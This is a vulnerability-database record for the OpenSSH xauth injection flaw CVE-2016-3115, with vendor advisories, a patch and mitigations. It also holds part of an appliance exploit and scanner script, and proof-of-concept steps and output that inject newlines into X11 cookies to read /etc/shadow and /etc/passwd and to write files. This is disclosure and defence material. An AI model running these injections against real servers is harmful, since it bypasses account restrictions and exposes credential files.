{\"Host\" : host, \"Content-Type\" : \"application/x-www-form-urlencoded\", \"Content-Length\" : \"57\"}\r\n\r\n client.request(\"POST\", WEB_URL, params, headers)\r\n\r\n response = client.getresponse()\r\n\r\n if(response.status == 408):\r\n print(\"[+] Success!\")\r\n else:\r\n print(\"[-] Service returned %d %s, which is actually not our criteria for success\" % (response.status, response.reason))\r\n\r\n return\r\n\r\n #\r\n # check the ssh network banner to identify appliances within range of <host>/24\r\n #\r\n elif(action == \"scan\"):\r\n count = 0\r\n print(\"[~] Scanning %s for LOGStorm appliances...\" % sys.argv[2])\r\n\r\n for x in range(1,255):\r\n banner = None\r\n\r\n #\r\n # 10.1.1.1/24 -> 10.1.1.[x]\r\n #\r\n host = str(sys.argv[2]).split('/')[0][:-1] + str(x)\r\n\r\n try:\r\n ssh.connect(host, SSH_PORT, \"user-that-doesnt-exist\", \"pass-that-doesnt-work\", timeout=2)\r\n except ssh_exception.NoValidConnectionsError:\r\n pass\r\n except socket.timeout:\r\n pass\r\n except ssh_exception.AuthenticationException as error:\r\n banner = ssh._transport.get_banner()\r\n if banner and SSH_BANNER in banner:\r\n print(\"[!] %s\\n\" % host)\r\n count+=1\r\n\r\n print(\"[+] Found %d appliance(s)\"% count)\r\n\r\n return\r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40858/"}], "seebug": [{"lastseen": "2017-11-19T12:14:37", "description": "\u6765\u6e90\u94fe\u63a5\uff1a https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\r\n### VuNote\r\n\r\n\tAuthor:\t\t<github.com/tintinweb>\r\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\r\n\tVersion: \t0.2\r\n\tDate: \t\tMar 3rd, 2016\r\n\t\r\n\tTag:\t\topenssh xauth command injection may lead to forced-command and /bin/false bypass \r\n\r\n### Overview\r\n\r\n\tName:\t\t\topenssh\r\n\tVendor:\t\t\tOpenBSD\r\n\tReferences:\t\t* http://www.openssh.com/[1]\r\n\t\r\n\tVersion:\t\t7.2p1 [2]\r\n\tLatest Version:\t7.2p1\r\n\tOther Versions:\t<= 7.2p1 (all versions; dating back ~20 years)\r\n\tPlatform(s):\tlinux\r\n\tTechnology:\t\tc\r\n\r\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\n\tOrigin:\t\t\tremote\r\n\tMin. Privs.:\tpost auth\r\n\r\n\tCVE:\t\t\tCVE-2016-3115\r\n\r\n\r\n\r\n### Description\r\n\r\nquote website [1]\r\n\r\n>OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.\r\n\r\n### Summary \r\n\r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie. \r\nThe newline acts as a command separator to the xauth binary. This attack requires \r\nthe server to have `X11Forwarding yes` enabled. Disabling it, mitigates this vector.\r\n\r\nBy injecting xauth commands one gains limited* read/write arbitrary files, \r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with the login shell \r\nconfigured as /bin/false or one with configured forced-commands - to bypass \r\naccount restriction. This is generally not expected.\r\n\r\nThe injected xauth commands are performed with the effective permissions of the \r\nlogged in user as the sshd already dropped its privileges. \r\n\r\nQuick-Info:\r\n\r\n* requires: X11Forwarding yes\r\n* bypasses /bin/false and forced-commands\r\n * OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)\r\n* does not bypass /bin/nologin (as there is special treatment for this)\r\n\r\nCapabilities (xauth):\r\n\r\n* Xauth\r\n\t* write file: limited chars, xauthdb format\r\n\t* read file: limit lines cut at first \\s\r\n\t* infoleak: environment\r\n\t* connect to other devices (may allow port probing)\r\n\r\n\r\nsee attached PoC, Patch\r\n\r\n\r\n### Details\r\n\r\n// see annotated code below\r\n\r\n * server_input_channel_req (serverloop.c)\r\n *- session_input_channel_req:2299 (session.c [2])\r\n *- session_x11_req:2181\r\n \r\n * do_exec_pty or do_exec_no_pty \r\n *- do_child\r\n *- do_rc_files (session.c:1335 [2])\r\n\r\nUpon receiving an `x11-req` type channel request sshd parses the channel request\r\nparameters `auth_proto` and `auth_data` from the client ssh packet where\r\n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `auth_data` contains the actual x11 auth cookie. This information is stored\r\nin a session specific datastore. When calling `execute` on that session, sshd will\r\ncall `do_rc_files` which tries to figure out if this is an x11 call by evaluating \r\nif `auth_proto` and `auth_data` (and `display`) are set. If that is the case AND\r\nthere is no system `/sshrc` existent on the server AND it no user-specific `$HOME/.ssh/rc`\r\nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.\r\nNote that `auth_data` nor `auth_proto` was sanitized or validated, it just contains\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n\r\nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted\r\ninput as arguments to that script.\r\nSidenote #2: client code also seems to not sanitize `auth_data`, `auth_proto`. [3]\r\n\r\nThis is an excerpt of the `man xauth` [4] to outline the capabilities of this xauth\r\ncommand injection:\r\n\r\n\tSYNOPSIS\r\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\r\n\r\n\t\tadd displayname protocolname hexkey\r\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n\t\t[n]extract filename displayname...\r\n\t\t[n]list [displayname...]\r\n\t\t[n]merge [filename...]\r\n\t\tremove displayname...\r\n\t\tsource filename\r\n\t\tinfo \r\n\t\texit\r\n\t\tquit\r\n\t\tversion\r\n\t\thelp\r\n\t\t?\r\n\t\t\r\nInteresting commands are:\r\n\t\r\n\tinfo\t - leaks environment information / path\r\n\t\t\t~# xauth info\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\tAuthority file: /root/.Xauthority\r\n\t\t\tFile new: yes\r\n\t\t\tFile locked: no\r\n\t\t\tNumber of entries: 0\r\n\t\t\tChanges honored: yes\r\n\t\t\tChanges made: no\r\n\t\t\tCurrent input: (argv):1\r\n\t\r\n\tsource\t - arbitrary file read (cut on first `\\s`)\r\n\t\t\t# xauth source /etc/shadow\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n\t\t\t\t\t\t\r\n\textract - arbitrary file write \r\n\t\t\t * limited characters\r\n\t * in xauth.db format\r\n\t * since it is not compressed it can be combined with `xauth add` to \r\n\t first store data in the database and then export it to an arbitrary\r\n\t location e.g. to plant a shell or do other things.\r\n\t\r\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n\t\t\t vulnerabilities in X.org\r\n\t\r\n\t\r\n### Source\r\n\r\nInline annotations are prefixed with `//#!`\r\n\r\n```c\r\n/*\r\n * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\r\n * first in this order).\r\n */\r\nstatic void\r\ndo_rc_files(Session *s, const char *shell)\r\n{\r\n...\r\n\t\tsnprintf(cmd, sizeof cmd, \"%s -q -\",\t\t\t\t\r\n\t\t options.xauth_location);\r\n\t\tf = popen(cmd, \"w\");\t\t\t\t\t\t\t//#! run xauth -q -\r\n\t\tif (f) {\r\n\t\t\tfprintf(f, \"remove %s\\n\",\t\t\t\t\t//#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command\r\n\t\t\t s->auth_display);\r\n\t\t\tfprintf(f, \"add %s %s %s\\n\",\t\t\t\t//#! \\n injection\r\n\t\t\t s->auth_display, s->auth_proto,\r\n\t\t\t s->auth_data);\r\n\t\t\tpclose(f);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"Could not run %s\\n\",\r\n\t\t\t cmd);\r\n\t\t}\r\n\t}\r\n}\r\n```\r\n\r\n### Proof of Concept\r\n\r\nPrerequisites: \r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* run `poc.py`\r\n\r\n\r\n\t Usage: <host> <port> <username> <password or path_to_privkey>\r\n\t \r\n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\t \r\n\r\npoc:\r\n\r\n1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\r\n\t```c\r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user1/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\r\n\r\n\t#cat /etc/passwd\r\n\tuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n\t```\r\n\t \r\n2. run sshd with `X11Forwarding yes` (kali default config)\r\n\r\n\t```c\r\n\t#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\r\n\t```\r\n\r\n3. `forced-commands` - connect with user1 and display env information\r\n\r\n\t```c\r\n\t#> python <host> 22 user1 .demoprivkey\r\n\t\r\n INFO:__main__:add this line to your authorized_keys file: \r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n\t\r\n\tINFO:__main__:connecting to: user1:<PKEY>@host:22\r\n\tINFO:__main__:connected!\r\n\tINFO:__main__:\r\n\tAvailable commands:\r\n\t .info\r\n\t .readfile <path>\r\n\t .writefile <path> <data>\r\n\t .exit .quit\r\n\t <any xauth command or type help>\r\n\t \r\n\t#> .info\r\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:Authority file: /home/user1/.Xauthority\r\n\tFile new: no\r\n\tFile locked: no\r\n\tNumber of entries: 1\r\n\tChanges honored: yes\r\n\tChanges made: no\r\n\tCurrent input: (stdin):3\r\n\t/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\t...\r\n\t```\r\n\t\t\r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n\t```c\r\n\t...\r\n\t#> .readfile /etc/passwd\r\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n\tsync:x:4:65534:sync:/bin:/bin/sync\r\n\t...\r\n\t```\r\n\t\t\r\n5. `forced-commands` - write `/tmp/testfile`\r\n\r\n\t```c\r\n\t#> .writefile /tmp/testfile `thisisatestfile`\r\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\t\r\n\t#> ls -lsat /tmp/testfile\r\n\t4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\r\n\t\r\n\t#> cat /tmp/testfile\r\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aa\r\n\t```\r\n\t\r\n6. `/bin/false` - connect and read `/etc/passwd`\r\n\r\n\t```c\r\n\t#> python <host> 22 user2 user2password\r\n\tINFO:__main__:connecting to: user2:user2password@host:22\r\n\tINFO:__main__:connected!\r\n\tINFO:__main__:\r\n\tAvailable commands:\r\n\t .info\r\n\t .readfile <path>\r\n\t .writefile <path> <data>\r\n\t .exit .quit\r\n\t <any xauth command or type help>\r\n\t \r\n\t#> .readfile /etc/passwd\r\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n\t...\r\n\tuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n\t...\r\n\t```\r\n\t\r\n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n\t```c\r\n\t#> generate 8.8.8.8:100 .\t\r\n\t\r\n\t#> tcpdump \r\n\tIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0\r\n\t```\r\n\t\t\r\n### Troubleshooting\r\n\r\n**Q**: `ImportError: No module named py3compat`\r\n\r\n**A**: outdated `paramiko` please upgrade with `pip install --upgrade paramiko`\r\n\r\n\r\n### Proposed Patch\r\n\r\n* Sanitize user-tainted input `s->auth_data`, `s->auth_proto`, `s->display`\r\n by replacing all non-printables by spaces. (I know this is kind of ugly ;))\r\n\r\n\t```c\r\n\t#> ~/openssh-7.2p1# diff -u session.c session.c.patched\r\n\t--- session.c 2016-02-17 11:32:11.616868923 -0500\r\n\t+++ session.c.patched 2016-02-17 11:33:33.681596273 -0500\r\n\t@@ -1327,6 +1327,18 @@\r\n\t return env;\r\n\t }\r\n\t\r\n\t+char *\r\n\t+sanitize_non_printable(char *s) {\r\n\t+ char *ptr = s;\r\n\t+ while (*ptr != '\\0'){\r\n\t+ if ((*ptr < 0x20)||(*s >= 0x7f )){ /* sanitizing \\n would basically be enough */\r\n\t+ *ptr = ' ';\r\n\t+ }\r\n\t+ ptr++;\r\n\t+ }\r\n\t+ return s;\r\n\t+}\r\n\t+\r\n\t /*\r\n\t * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\r\n\t * first in this order).\r\n\t@@ -1341,6 +1353,9 @@\r\n\t\r\n\t do_xauth =\r\n\t s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;\r\n\t+ sanitize_non_printable(s->display);\r\n\t+ sanitize_non_printable(s->auth_proto);\r\n\t+ sanitize_non_printable(s->auth_data);\r\n\t /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */\r\n\t if (!s->is_subsystem && options.adm_forced_command == NULL &&\r\n\t !no_user_rc && options.permit_user_rc &&\r\n\t```\r\n\r\n### Mitigation / Workaround\r\n* disable x11-forwarding: `sshd_config` set `X11Forwarding no`\r\n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`\r\n\r\nNotes\r\n-----\r\n\r\nVerified, resolved and released within a few days. very impressive.\r\n\r\nVendor response: see advisory [5]\r\n\r\n### References\r\n\r\n\t[1] http://www.openssh.com/\r\n\t[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388\r\n\t[3]\thttps://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376\r\n\t[4] http://linux.die.net/man/1/xauth\r\n\t[5] http://www.openssh.com/txt/x11fwd.adv\r\n\t\r\n### Contact\r\n\r\n\r\n\thttps://github.com/tintinweb", "published": "2016-03-16T00:00:00", "type": "seebug", "title": "OpenSSH <=7.2p1 xauth injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91041", "id": "SSV:91041", "sourceData": "\n \r\nPrerequisites:\r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* make sure `poc.py`\r\n\r\n\r\n Usage: <host> <port> <username> <password or path_to_privkey>\r\n\r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\r\n\r\npoc:\r\n\r\n1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\r\n\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user1/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa \r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15\r\n user1@box\r\n\r\n#cat /etc/passwd\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n \r\n2. run sshd with `X11Forwarding yes` (kali default config)\r\n\r\n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\r\n\r\n3. `forced-commands` - connect with user1 and display env information\r\n\r\n#> python <host> 22 user1 .demoprivkey\r\n\r\nINFO:__main__:add this line to your authorized_keys file:\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa \r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15\r\n user@box\r\n\r\nINFO:__main__:connecting to: user1:<PKEY>@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .info\r\nDEBUG:__main__:auth_cookie: '\\ninfo'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:Authority file: /home/user1/.Xauthority\r\nFile new: no\r\nFile locked: no\r\nNumber of entries: 1\r\nChanges honored: yes\r\nChanges made: no\r\nCurrent input: (stdin):3\r\n/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n...\r\n \r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n...\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\n...\r\n\r\n5. `forced-commands` - write `/tmp/testfile`\r\n\r\n#> .writefile /tmp/testfile `thisisatestfile`\r\nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\r\n#> ls -lsat /tmp/testfile\r\n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\r\n\r\n#> cat /tmp/testfile\r\n\\FA65500hi\\FA65500`thisisatestfile`\\AA\r\n\r\n6. `/bin/false` - connect and read `/etc/passwd`\r\n\r\n#> python <host> 22 user2 user2password\r\nINFO:__main__:connecting to: user2:user2password@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n...\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n...\r\n \r\n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n#> generate 8.8.8.8:100 . \r\n\r\n#> tcpdump\r\nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr \r\n0,nop,wscale 10], length 0\r\n \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-91041", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:07", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "[5.3p1-114]\n- CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (#1245969)\n[5.3p1-113]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317816)", "edition": 4, "modified": "2016-03-21T00:00:00", "published": "2016-03-21T00:00:00", "id": "ELSA-2016-0466", "href": "http://linux.oracle.com/errata/ELSA-2016-0466.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "[4.3p2-82.0.2]\n- CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024]", "edition": 4, "modified": "2016-04-03T00:00:00", "published": "2016-04-03T00:00:00", "id": "ELSA-2016-3531", "href": "http://linux.oracle.com/errata/ELSA-2016-3531.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "[6.6.1p1-25 + 0.9.3-9]\n- CVE-2016-1908: possible fallback from untrusted to trusted X11 forwarding (#1298741)\n[6.6.1p1-24 + 0.9.3-9]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317818)", "edition": 4, "modified": "2016-03-21T00:00:00", "published": "2016-03-21T00:00:00", "id": "ELSA-2016-0465", "href": "http://linux.oracle.com/errata/ELSA-2016-0465.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-6564", "CVE-2015-5352", "CVE-2016-3115", "CVE-2015-6563"], "description": "[5.3p1-117]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317817)\n[5.3p1-116]\n- Restore functionallity of pam_ssh_agent_auth in FIPS mode (#1278315)\n- Initialize devices_done variable for challenge response (#1281468)\n- Update behaviour of X11 forwarding to match upstream (#1299048)\n[5.3p1-115]\n- Ammends previous release, fixing typos and behaviour changes", "edition": 4, "modified": "2016-05-12T00:00:00", "published": "2016-05-12T00:00:00", "id": "ELSA-2016-0741", "href": "http://linux.oracle.com/errata/ELSA-2016-0741.html", "title": "openssh security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:48", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nIt was discovered that the OpenSSH sshd daemon did not check the list of\nkeyboard-interactive authentication methods for duplicates. A remote\nattacker could use this flaw to bypass the MaxAuthTries limit, making it\neasier to perform password guessing attacks. (CVE-2015-5600)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.\n", "modified": "2018-06-06T20:24:20", "published": "2016-03-21T04:00:00", "id": "RHSA-2016:0466", "href": "https://access.redhat.com/errata/RHSA-2016:0466", "type": "redhat", "title": "(RHSA-2016:0466) Moderate: openssh security update", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could possibly use this flaw to bypass intended\nrestrictions. (CVE-2016-3115)\n\nAn access flaw was discovered in OpenSSH; the OpenSSH client did not\ncorrectly handle failures to generate authentication cookies for untrusted\nX11 forwarding. A malicious or compromised remote X application could\npossibly use this flaw to establish a trusted connection to the local X\nserver, even if only untrusted X11 forwarding was requested.\n(CVE-2016-1908)\n\nAll openssh users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the OpenSSH server daemon (sshd) will be restarted automatically.", "modified": "2018-04-12T03:32:38", "published": "2016-03-22T00:03:21", "id": "RHSA-2016:0465", "href": "https://access.redhat.com/errata/RHSA-2016:0465", "type": "redhat", "title": "(RHSA-2016:0465) Moderate: openssh security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2020-12-24T10:41:33", "bulletinFamily": "software", "cvelist": ["CVE-2015-3115", "CVE-2016-3115"], "description": "### SUMMARY\n\nBlue Coat products that include vulnerable versions of OpenSSH and enable X11 forwarding are susceptible to a command injection vulnerability due to insufficient input data sanitization. An authenticated remote attacker can exploit this vulnerability to bypass intended command restrictions enforced by a restricted shell or the target's SSH configuration. The attacker can also execute arbitrary commands. \n \n\n\n### AFFECTED PRODUCTS\n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 5.4 and later | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 5.3 | Upgrade to 5.3.6. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-3115 | 5.3 | Upgrade to 5.3.6. \n \n \n\n The following products contain a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** 